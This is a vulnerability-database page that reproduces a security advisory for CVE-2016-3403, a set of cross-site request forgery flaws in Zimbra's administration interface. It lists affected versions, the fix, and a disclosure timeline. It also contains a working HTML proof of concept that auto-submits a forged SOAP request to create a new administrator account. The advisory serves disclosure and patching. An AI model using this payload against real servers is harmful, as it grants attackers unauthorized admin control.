Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Zimbra Cross Site Request Forgery

🗓️ 13 Jan 2017 00:00:00Reported by Damien CauquilType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 77 Views

Multiple CSRF vulnerabilities in Zimbra Administration interface, allowing arbitrary action

Related
Code
ReporterTitlePublishedViews
Family
CNVD		Multiple Cross-Site Request Forgery Vulnerabilities in Zimbra
13 Jan 201700:00
cnvd
CVE		CVE-2016-3403
17 May 201714:00
cve
Cvelist		CVE-2016-3403
17 May 201714:00
cvelist
EUVD		EUVD-2016-4429
7 Oct 202500:30
euvd
NVD		CVE-2016-3403
17 May 201714:29
nvd
OSV		CVE-2016-3403
17 May 201714:29
osv
Prion		Cross site request forgery (csrf)
17 May 201714:29
prion
`# CVE-2016-3403: Multiple CSRF in Zimbra Administration interface  
  
## Description  
  
Multiple CSRF vulnerabilities have been found in the administration  
interface of Zimbra, giving possibilities like adding, modifying and  
removing admin accounts.  
  
## Vulnerability  
  
Every forms in the Administration part of Zimbra are vulnerable to CSRF  
because of the lack of a CSRF token identifying a valid session. As a  
consequence, requests can be forged and played arbitrarily.  
  
**Access Vector**: remote  
**Security Risk**: low  
**Vulnerability**: CWE-352  
**CVSS Base score**: 5.8  
  
## Proof of Concept  
  
```html  
<html>  
<body>  
<form enctype="text/plain" id="trololo"  
action="https://192.168.0.171:7071/service/admin/soap/CreateAccountRequest"  
method="POST">  
<input name='<soap:Envelope  
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context  
xmlns="urn:zimbra"><userAgent xmlns="" name="DTC"/><session xmlns=""  
id="1337"/><format xmlns=""  
type="js"/></context></soap:Header><soap:Body><CreateAccountRequest  
xmlns="urn:zimbraAdmin"><name xmlns="">[email protected]</name><password  
xmlns="">test1234</password><a xmlns=""  
n="zimbraAccountStatus">active</a><a xmlns=""  
n="displayName">ItWorks</a><a xmlns="" n'  
  
value='"sn">itworks</a><a xmlns=""  
n="zimbraIsAdminAccount">TRUE</a></CreateAccountRequest></soap:Body></soap:Envelope>'/>  
</form>  
<script>  
document.forms[0].submit();  
</script>  
</body>  
</html>  
```  
  
## Solution  
  
* Upgrade to version 8.7  
  
## Affected versions  
  
* All versions previous to 8.7  
  
## Fixes  
  
* https://bugzilla.zimbra.com/show_bug.cgi?id=100885  
* https://bugzilla.zimbra.com/show_bug.cgi?id=100899  
  
## Timeline (dd/mm/yyyy)  
  
* 24/02/2016: Issue reported to Zimbra  
* 24/02/2016: Issue aknwoledged  
* 20/06/2016: complete fixes released with version 8.7  
  
## Credits  
  
* Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail  
-dot- fr)  
* Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com)  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Jan 2017 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.00369
zimbracsrfadministrationvulnerabilityremotecwe-352cvss base score 5.8upgradeversion 8.7bugzillatimelinesysdream
77